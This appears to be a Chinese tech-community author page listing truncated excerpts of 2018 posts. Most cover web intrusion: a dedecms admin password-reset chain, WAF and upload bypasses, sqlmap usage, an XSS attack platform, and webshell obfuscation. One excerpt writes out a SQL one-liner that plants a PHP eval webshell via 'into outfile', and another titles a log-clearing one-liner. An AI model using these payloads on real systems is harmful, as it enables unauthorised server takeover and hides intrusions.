首页
学习
活动
专区
工具
TVP
发布

小白安全

菜鸟安全
专栏作者
126
文章
245297
阅读量
55
订阅数
重置dedecms管理员后台密码重现及分析
0×00 概述 2018年1月,网上爆出dedecms v5.7 sp2的前台任意用户密码重置和前台任意用户登录漏洞,加上一个管理员前台可修改其后台密码的安全问题,形成漏洞利用链,这招组合拳可以重置管理员后台密码。 先来看看整体利用流程:    重置admin前台密码—>用admin登录前台—>重置admin前后台密码 0×01 前台任意用户密码重置分析 组合拳第一式:重置管理员前台密码 漏洞文件:member\resetpassword.php:75 else if(
奶糖味的代言
2018-04-16
6.4K0
EMLOG博客系统插件挂载点及说明
挂载点:doAction('adm_main_top') 所在文件:admin/views/default/header.php 描述:后台红线区域扩展  挂载点:doAction('adm_head') 所在文件:admin/views/default/header.php 描述:后台头部扩展:可以用于增加后台css样式、加载js等 挂载点:doAction('adm_siderbar_ext') 所在文件:admin/views/default/header.php 描
奶糖味的代言
2018-04-16
1.1K0
渗透测试SHELL语句参考
SQL注入一句话: select '<? php eval($_POST[xiaobai]);?>' into outfile 'd:/wwwroot/1.php'; Linux清除访问日志一句话
奶糖味的代言
2018-04-16
5680
过安全狗waf注入技巧
 过安全狗waf注入 前提web页面存在注入漏洞 测试开始本地搭建环境 环境   安全狗(APACE版)V4.0 防护规则全开 绕过 1. 延时盲注 http
奶糖味的代言
2018-04-16
7960
关于YUNUCMSv1.0.6 任意文件删除与配置文件写shell-freebuf漏斗社区发布
任意文件删除漏洞 0×00 相关环境 源码信息:YUNUCMSv1.0.6 问题文件: \YUNUCMSv1.0.6\statics\ueditor\php\vendor\Local.class.php 漏洞类型:任意文件删除漏洞 站点地址:http://www.yunucms.com/ 0×01 漏洞分析 在文件\YUNUCMSv1.0.6\statics\ueditor\php\vendor\Local.class.php的第3
奶糖味的代言
2018-04-16
1.1K0
SQLMAP命令中文注释
sqlmap常用命令大全 sqlmap -u “http://url/news?id=1″ –current-user #获取当前用户名称sqlmap -u “http://www.xxoo.c
奶糖味的代言
2018-04-16
2K0
搭建xss跨站脚本攻击平台教程
这篇文章打算很久以前就发了但是总是忘记刚刚看了一下i春秋 源码下载:链接:http://pan.baidu.com/s/1gfdUYiB 密码:efp1 下载之后解压源码,放到网站目录,然后修改配置文件:config.php 将根目录下的数据库文件(xssplatform.sql)导入到mysql数据库中 不过导入的时候出了点问题: 源文件里的数据库文件没有“`pvicnikh_xss`”这个数据库: 然后导致导入.sql文件的时候出错了,mmp 解决办
奶糖味的代言
2018-04-16
1.6K0
emlog博客系统去除分类sort优化SEO
分类URL网址中有个sort字样只会在开启伪静态后才显示 想去除EMLOG伪静态分类网址中的sort, include文件夹下,在lib文件夹下找到dispatcher.php和url.php这两个文件使用编辑器打开, 具体看一下内容: 一、使用编辑器打开url.php文件 找到 $sortUrl = BLOG_URL . 'sort/' . $sort_index; 改成 $sortUrl = BLOG_URL. $sort_index; 找到 $sortUrl = BLOG_URL . '
奶糖味的代言
2018-04-16
6620
当webshell不可执行cmshell时 【菜刀的安全模式】可用此脚本突破执行cmd命令
<?php /* ============== */ error_reporting(0); ini_set('max_execution_time',0); // -------------
奶糖味的代言
2018-04-16
1.5K0
FreeBuf发布某CMS注入分析及注入点总结
Bluecms是一个地方网站的开源的cms,在很多地方性的网站上应用还是不少的,今天在逛seebug的时候看到了一个漏洞的公告。 有公告但是这里还没有详情,很好奇我就去下载了一套源码看了看,好像
奶糖味的代言
2018-04-16
6900
phpmyadmin新姿势getshell
在一个有WAF、并且mysql中的Into outfile禁用的情况下,我该如何getshell? 首先环境如下: OS:Windows 2003 WAF:Safe Dog 4.0正式版 phpmyadmin:4.7(许多都可以) Mysql:5.5+ PHP:5.3 Apache:2.x 目前 into outfile 已经被禁用,并且WAF也会在写入文件的时候拦截。 那么我们尝试通过一个脑洞大开的方法去getshell。 (必须是mysql root权限)
奶糖味的代言
2018-04-16
1.6K0
web渗透思路及总结
(一)针对网站程序,不考虑服务器。 一、查找注入,注意数据库用户权限和站库是否同服。 二、查找XSS,最近盲打很流行,不管怎样我们的目的是进入后台。 三、查找上传,一些能上传的页面,比如申请友链、会员头像、和一些敏感页面等等,注意查看验证方式是否能绕过,注意结合服务器的解析特性,比如典型的IIS6.0、阿帕奇等。 四、查找编辑器,比较典型的ewebeditor、fckeditor等等。 五、查找phpmyadmin等管理程序,可以尝试弱口令,或者寻找其漏洞。 六、百度、谷
奶糖味的代言
2018-04-16
2.4K0
反射跨站脚本(XSS)示例
如何利用它? 原来的要求如下: 应用程序的回应非常清楚。用户ID为空(空)。我们没有为它指定一个值。 我们有XSS。有效负载未被应用程序编码/过滤,响应的内容类型显示为HTML: 获得
奶糖味的代言
2018-04-16
2.8K0
MongoDB安全 – PHP注入检测
什么是MongoDB MongoDB 是一个基于分布式文件存储的数据库。MongoDB是个开源的NoSql数据库,其通过类似于JSON格式的数据存储,这使得它的结构就变得非常自由。通过MongoDB的查询语句就可以查询具体内容。 为什么使用MongoDB 其实大部分原因只是因为MongoDB可以快速查找出结果,它大概可以达到10亿/秒。当然MongoDB很流行的另外一个原因是在很多应用场景下,关系型数据库是不适合的。例如,使用到非结构化,半自动化和多种状态的数据的应用,或者对数据可扩展性要求高的。
奶糖味的代言
2018-04-16
1.6K0
SQL注入 上传绕过安全狗
一,绕过安全狗上传可执行脚本 附上php上传脚本源码,此源码未对上传文件类型做校验 <?php         move_uploaded_file($_FILES["file"]["tmp_name
奶糖味的代言
2018-04-16
1.6K0
绕过软WAF攻略
现在软waf较为多,就在今年夏天苦逼挖洞的日子里经常遇到360主机卫士,安全狗,云锁之类的软waf进行拦截,经常碰到如下拦截提示: 看到以上三个拦截提示就让人头疼不已,欲罢不能。 数据库特
奶糖味的代言
2018-04-16
2.3K0
小白博客 迷你音乐播放器及实现全站pjax无刷新加载
演示截图: 请点击此处输入图片描述 请点击此处输入图片描述 使用教程,下载播放器文件,直接上传压缩包至你的网站根目录,然后解压到根目录。 然后在你的网站程序模板文件或者html中
奶糖味的代言
2018-04-13
2.1K0
小白博客 SQL注入实战
本文仅供学习交流,目的是为了构建更加安全的网络环境! 注入地址 某VIP会员专用系统http://www.tcmpv.com/index.php/Home/Public/login.html 相关工具 注入工具: 超级SQL注入工具【SSQLInjection】http://www.shack2.org/article/1417357815.html 明小子 抓包工具: Wireshark 注入过程 1.测试漏洞 1)测试 ' 首先打开网
奶糖味的代言
2018-04-12
1.4K0
【PHP】WEBSHELL各类变形方法总结
简介 WebShell的变形技术与各种防护软件的检测方法一直都在相互对抗,本篇文章就对目前常见的WebShell的变形技术进行总结。 目前的防护软件对能够执行命令函数和能够执行代码的函数都会格外的敏感,如eavl、assert、system、popen、shell_exec,所以像最为简单的eval($_POST[cmd])的一句话就一定会被查杀。所以目前的变形的本质都在于如何隐藏自己的敏感函数。 巧用$GPC 利用$GLOBALS @eval($GLOBA
奶糖味的代言
2018-04-12
2.3K0
EMLOG更改后台地址导致微语表情不显示解决方法
解决办法: 在include/lib/function.base.php中找到一下代码 /** * 替换表情 * * @param $t */ function emoFormat($t){ $emos = array('[耶]'=>'0.gif', '[呵呵]'=>'1.gif', '[悲伤]'=>'2.gif', '[抓狂]'=>'3.gif', '[衰]'=>'4.gif', '[花心]'=>'5.gif', '[哼]'=>'6.gif', '[泪]'=>'7.gif', '[害羞]
奶糖味的代言
2018-04-12
6410
点击加载更多
社区活动
腾讯技术创作狂欢月
“码”上创作 21 天,分 10000 元奖品池!
Python精品学习库
代码在线跑,知识轻松学
博客搬家 | 分享价值百万资源包
自行/邀约他人一键搬运博客,速成社区影响力并领取好礼
技术创作特训营·精选知识专栏
往期视频·千货材料·成员作品 最新动态
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档